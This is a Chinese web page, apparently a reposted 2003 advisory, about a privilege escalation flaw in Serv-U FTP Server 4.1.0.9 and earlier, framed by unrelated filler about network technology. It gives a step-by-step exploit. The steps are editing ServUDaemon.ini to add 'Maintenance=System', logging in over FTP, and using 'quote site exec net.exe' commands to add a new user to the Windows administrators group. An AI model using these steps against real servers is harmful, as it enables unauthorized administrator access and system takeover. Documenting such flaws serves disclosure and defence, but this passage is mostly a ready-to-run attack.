发布时间:2023-12-19 来源:win7旗舰版 浏览量:
|
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 Serv-U FTP Server远程/本地提升权限缺陷发布日期:2003年12月1日(首发与《黑客X档案》) 作者:赵原(紫幻) Email:_zihuan@163.com 本地提升权限:是 远程提升权限:是 使用前提条件:对Serv-U配置文件有修改权限 声明:这只是一个提升权限的思路和方法。 一、受影响的软件 Serv-U FTP Server 4.1.0.9 (以及以前所有版本) 二、受影响系统 Microsoft Windows Server 2003 所有版本 Microsoft Windows XP 所有版本 Microsoft Windows 2000 所有版本 Microsoft Windows NT 所有版本 三、综述 Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。 四、缺陷分析: Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响) 五、测试方法: 1、本地测试 假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为: [GLOBAL] Version=4.1.0.0 // Serv-U Ftp Server 版本号 ProcessID=584 RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB [DOMAINS] Domain1=127.0.0.1 21|127.0.0.1|1|0 //主机IP以及域名,端口情况 [Domain1] User1=zihuan|1|0 [USER=zihuan|1] Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6 HomeDir=c: // 可以浏览的目录 TimeOut=600 Access1=C:|RWAMLCDP 如果把ServUDaemon.in文件修改为: [GLOBAL] Version=4.1.0.0 ProcessID=584 RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB [DOMAINS] Domain1=127.0.0.1 21|127.0.0.1|1|0 [Domain1] User1=zihuan|1|0 [USER=zihuan|1] Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6 HomeDir=c: TimeOut=600 Maintenance=System //权限类型 Access1=C:|RWAMELCDP 以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令: ftp>open ip Connected to ip. 220 Serv-U FTP Server v4.1.0.0 for WinSock ready... User (ip:(none)): id //输入构造的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系统的net.exe文件加用户。 200 EXEC command successful (TID=33). ftp>quote site exec net.exe localhost administrators zihuan /add //提升为超级用户 这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
Serv-U FTP Server远程/本地提升权限缺陷发布日期:2003年12月1日(首发与《黑
Serv-U MDTM Time Zone Exploit我用的Serv-U 5.0来测试,先构造
作为一款精典的FTP服务器软件,SERV-U一直被大部分管理员所使用,它简单的安装和配置以及强大的
下面就到了该对SERV-U进行安全设置的时候了。首先建立一个WINDOWS账号SSERVU,密码也
┆
